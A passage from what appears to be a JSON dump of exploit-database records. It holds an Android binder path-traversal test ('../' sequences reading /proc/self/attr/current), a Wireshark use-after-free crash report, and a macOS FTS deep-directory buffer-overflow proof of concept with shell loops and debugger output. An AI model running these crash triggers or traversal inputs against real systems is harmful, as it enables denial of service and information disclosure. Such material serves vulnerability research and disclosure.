67 g 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 .\r\n0064: 0d . 00 . 00 . 00 . 6c l 00 . 67 g 00 . 68 h 00 . 61 a 00 . 73 s 00 . 68 h 00 .\r\n0080: 73 s 00 . 74 t 00 . 6f o 00 . 72 r 00 . 61 a 00 . 67 g 00 . 65 e 00 . 00 . 00 .\r\nBR_NOOP:\r\nBR_TRANSACTION_COMPLETE:\r\nBR_NOOP:\r\nBR_REPLY:\r\n target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000\r\n pid 0 uid 1000 data 24 offs 8\r\n0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 01 . 00 . 00 . 00 . 55 U 00 . 00 . 00 .\r\n0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .\r\n - type 73682a85 flags 0000017f ptr 0000005500000001 cookie 0000000000000000\r\n[0] got handle 00000001\r\n[0] reading hash\r\n0000: 00 . 01 . 00 . 00 . 1b . 00 . 00 . 00 . 63 c 00 . 6f o 00 . 6d m 00 . 2e . 00 .\r\n0016: 6c l 00 . 67 g 00 . 65 e 00 . 2e . 00 . 49 I 00 . 48 H 00 . 61 a 00 . 73 s 00 .\r\n0032: 68 h 00 . 53 S 00 . 74 t 00 . 6f o 00 . 72 r 00 . 61 a 00 . 67 g 00 . 65 e 00 .\r\n0048: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 00 . 00 .\r\n0064: 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e .\r\n0080: 2e . 2f / 2e . 2e . 2f / 70 p 72 r 6f o 63 c 2f / 73 s 65 e 6c l 66 f 2f / 61 a\r\n0096: 74 t 74 t 72 r 2f / 63 c 75 u 72 r 72 r 65 e 6e n 74 t 00 . 00 . 00 . 00 . 00 .\r\nBR_NOOP:\r\nBR_TRANSACTION_COMPLETE:\r\nBR_NOOP:\r\nBR_REPLY:\r\n target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000\r\n pid 0 uid 1000 data 36 offs 0\r\n0000: 75 u 3a : 72 r 3a : 6c l 67 g 68 h 61 a 73 s 68 h 73 s 74 t 6f o 72 r 61 a 67 g\r\n0016: 65 e 73 s 65 e 72 r 76 v 65 e 72 r 3a : 73 s 30 0 00 . 00 . 00 . 00 . 00 . 00 .\r\n0032: 00 . 00 . 00 . 00 .\r\nu:r:lghashstorageserver:s0\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41352.zip\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/27006", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-06T03:39:17", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2016-02-26T00:00:00", "published": "2016-02-26T00:00:00", "href": "https://0day.today/exploit/description/25853", "id": "1337DAY-ID-25853", "title": "Wireshark - print_hex_data_buffer / print_packet Use-After-Free", "type": "zdt", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=651\r\n \r\nThe following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==14146==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a0 at pc 0x000000b2c8eb bp 0x7ffdfc45fa70 sp 0x7ffdfc45fa68\r\nREAD of size 1 at 0x6070000003a0 thread T0\r\n #0 0xb2c8ea in print_hex_data_buffer wireshark/epan/print.c:987:13\r\n #1 0xb2bf43 in print_hex_data wireshark/epan/print.c:904:14\r\n #2 0x5422e2 in print_packet wireshark/tshark.c:4155:10\r\n #3 0x53cb2e in process_packet wireshark/tshark.c:3742:7\r\n #4 0x535d90 in load_cap_file wireshark/tshark.c:3484:11\r\n #5 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\n0x6070000003a0 is located 0 bytes inside of 65-byte region [0x6070000003a0,0x6070000003e1)\r\nfreed by thread T0 here:\r\n #0 0x4d6ce0 in free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30\r\n #1 0xc1fd8e in real_free wireshark/epan/tvbuff_real.c:47:3\r\n #2 0xc2229c in tvb_free_internal wireshark/epan/tvbuff.c:110:3\r\n #3 0xc22049 in tvb_free_chain wireshark/epan/tvbuff.c:135:3\r\n #4 0xc21ed1 in tvb_free wireshark/epan/tvbuff.c:125:2\r\n #5 0xbc972e in free_all_fragments wireshark/epan/reassemble.c:351:4\r\n #6 0xbd40e5 in fragment_add_seq_common wireshark/epan/reassemble.c:1919:5\r\n #7 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12\r\n #8 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9\r\n #9 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28\r\n #10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #13 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11\r\n #14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #16 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #17 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #18 0xadffde in dissect_record wireshark/epan/packet.c:501:3\r\n #19 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2\r\n #20 0x53c91b in process_packet wireshark/tshark.c:3728:5\r\n #21 0x535d90 in load_cap_file wireshark/tshark.c:3484:11\r\n #22 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7ff6062f0610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0xbe1202 in fragment_add_seq_work wireshark/epan/reassemble.c:1793:2\r\n #3 0xbd4181 in fragment_add_seq_common wireshark/epan/reassemble.c:1925:6\r\n #4 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12\r\n #5 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9\r\n #6 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28\r\n #7 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #8 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #9 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #10 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11\r\n #11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #13 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #14 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #15 0xadffde in dissect_record wireshark/epan/packet.c:501:3\r\n #16 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2\r\n #17 0x53c91b in process_packet wireshark/tshark.c:3728:5\r\n #18 0x535d90 in load_cap_file wireshark/tshark.c:3484:11\r\n #19 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free wireshark/epan/print.c:987:13 in print_hex_data_buffer\r\nShadow bytes around the buggy address:\r\n 0x0c0e7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd\r\n 0x0c0e7fff8050: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd\r\n=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa\r\n 0x0c0e7fff8080: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa\r\n 0x0c0e7fff8090: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fd fd\r\n 0x0c0e7fff80a0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd\r\n 0x0c0e7fff80b0: fd fd fd fd fd fa fa fa fa fa 00 00 00 00 00 00\r\n 0x0c0e7fff80c0: 00 00 06 fa fa fa fa fa 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==14146==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11799. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39503.zip\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25853"}, {"lastseen": "2018-04-09T03:40:05", "bulletinFamily": "exploit", "description": "Mac OS X version 10.11 suffered from an FTS deep structure of the file system buffer overflow vulnerability.", "modified": "2015-12-08T00:00:00", "published": "2015-12-08T00:00:00", "id": "1337DAY-ID-24685", "href": "https://0day.today/exploit/description/24685", "type": "zdt", "title": "Mac OS X 10.11 FTS Deep Structure of the File System Buffer Overflow Exploit", "sourceData": "MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow\r\nCredit: Maksymilian Arciemowicz ( CXSECURITY )\r\nWebsite: \r\nhttp://cxsecurity.com/\r\nhttp://cert.cx/\r\n\r\n\r\nAffected software:\r\n- MACOS's Commands such as: ls, find, rm \r\n- iPhone 4s and later,\r\n- Apple Watch Sport, Apple Watch, Apple Watch Edition and Apple Watch Hermes\r\n- Apple TV (4th generation)\r\n- probably more\r\n\r\nApple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. Unexpected behavior of many programs and invalid memory write seems really interesting.\r\n \r\nPoC:\r\nCreate an direcotry and perform the following actions:\r\n\r\n\r\n# for i in {1..1024}; do mkdir B && cd B; done\r\n...\r\ncd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory\r\n\r\n\r\nIf such error occur, don't panic script will continuing. When the script will finish, you need back to top of directory. E.g.\r\n\r\n\r\n# for i in {1..1024}; do cd .. ; done\r\n\r\n\r\nThen you can perform recursive 'ls' command. Let's run it ten times:\r\n\r\n\r\n# for i in {1..10}; do ls -laR > /dev/null; done\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nSegmentation fault: 11\r\nSegmentation fault: 11\r\nSegmentation fault: 11\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nSegmentation fault: 11\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\n\r\n\r\ncrash randometly. Let's see valgrind and lldb \r\n\r\n\r\nLLDB:\r\n...\r\n/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:\r\ntotal 0\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8\r\n\r\n./B/B/B/B/B/B/B/B/..../B/B:\r\nProcess 987 stopped\r\n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00)\r\n frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18\r\nlibsystem_c.dylib`strlen:\r\n-> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0\r\n 0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi\r\n 0x7fff97ab6d3a <+26>: andq $0xf, %rcx\r\n 0x7fff97ab6d3e <+30>: orq $-0x1, %rax\r\n\r\n(lldb) x/x $rdi\r\nerror: memory read failed for 0xfeb66c00\r\n(lldb) register read\r\nGeneral Purpose Registers:\r\n rax = 0x00000000ffffffff\r\n rbx = 0x00000000ffffffff\r\n rcx = 0x00000000feb66c08\r\n rdx = 0x00000000feb66c08\r\n rdi = 0x00000000feb66c00\r\n rsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742\r\n rbp = 0x00007fff5fbfe710\r\n rsp = 0x00007fff5fbfe710\r\n...\r\n rip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18\r\n...\r\n(lldb) bt\r\n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00)\r\n * frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18\r\n frame #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713\r\n frame #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669\r\n frame #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596\r\n frame #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80\r\n frame #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128\r\n frame #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564\r\n frame #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421\r\n frame #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300\r\n frame #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1\r\n\r\n=== Time for Valgrind =============\r\n\r\nB/B/B/B/B/../B:\r\ntotal 0\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8\r\n\r\n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:\r\ntotal 0\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8\r\n==1009== Invalid write of size 1\r\n==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100001DAD: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? (in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== by 0x104809C8D: ???\r\n==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd\r\n==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100001B92: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? (in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== by 0x104809C8D: ???\r\n==1009== \r\n\r\n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:\r\n==1009== Invalid read of size 1\r\n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x1000024A7: ??? (in /bin/ls)\r\n==1009== by 0x100001CFC: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? (in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd\r\n==1009== \r\n==1009== \r\n==1009== Process terminating with default action of signal 11 (SIGSEGV)\r\n==1009== Access not within mapped region at address 0x102D20318\r\n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x1000024A7: ??? (in /bin/ls)\r\n==1009== by 0x100001CFC: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? (in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== If you believe this happened as a result of a stack\r\n==1009== overflow in your program's main thread (unlikely but\r\n==1009== possible), you can try to increase the size of the\r\n==1009== main thread stack using the --main-stacksize= flag.\r\n==1009== The main thread stack size used in this run was 8388608.\r\n==1009== \r\n==1009== HEAP SUMMARY:\r\n==1009== in use at exit: 1,671,999 bytes in 6,025 blocks\r\n==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated\r\n==1009== \r\n==1009== LEAK SUMMARY:\r\n==1009== definitely lost: 519 bytes in 6 blocks\r\n==1009== indirectly lost: 104 bytes in 6 blocks\r\n==1009== possibly lost: 0 bytes in 0 blocks\r\n==1009== still reachable: 1,645,151 bytes in 5,819 blocks\r\n==1009== suppressed: 26,225 bytes in 194 blocks\r\n==1009== Rerun with --leak-check=full to see details of leaked memory\r\n==1009== \r\n==1009== For counts of detected and suppressed errors, rerun with: -v\r\n==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)\r\nSegmentation fault: 11\r\nMacMini:SCANME cxsecurity$\r\n\r\n\r\nIt looks like a buffer overflow in memmove(). Code\r\n\r\nhttp://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c\r\n\r\n\r\nThe same issue for 'find' which may be used in cron scripts like\r\n\r\n\r\n./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print\r\n./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print\r\n./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days \r\n./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1;\r\n\r\n\r\nLet's see valgrind output.\r\n\r\n\r\nMacMini:SCANME cxsecurity$ valgrind find . -name \"R\"\r\n==1055== Memcheck, a memory error detector\r\n==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.\r\n==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info\r\n==1055== Command: find . -name R\r\n==1055== \r\nfind: ./.Trashes: Permission denied\r\n==1055== Invalid write of size 2\r\n==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)\r\n==1055== by 0x1000013FA: ??? (in /usr/bin/find)\r\n==1055== by 0x1000052AD: ??? (in /usr/bin/find)\r\n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1055== by 0x3: ???\r\n==1055== by 0x10480CC7F: ???\r\n==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd\r\n==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib)\r\n==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)\r\n==1055== by 0x1000013FA: ??? (in /usr/bin/find)\r\n==1055== by 0x1000052AD: ??? (in /usr/bin/find)\r\n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1055== by 0x3: ???\r\n==1055== by 0x10480CC7F: ???\r\n...\r\n\r\nInvalid memory write without crashing.\r\n\r\n \r\nBTW:\r\nMany vendors of antiviruses for MACOS X seems to be blind for malicus software above 512 level of directory. Eg. 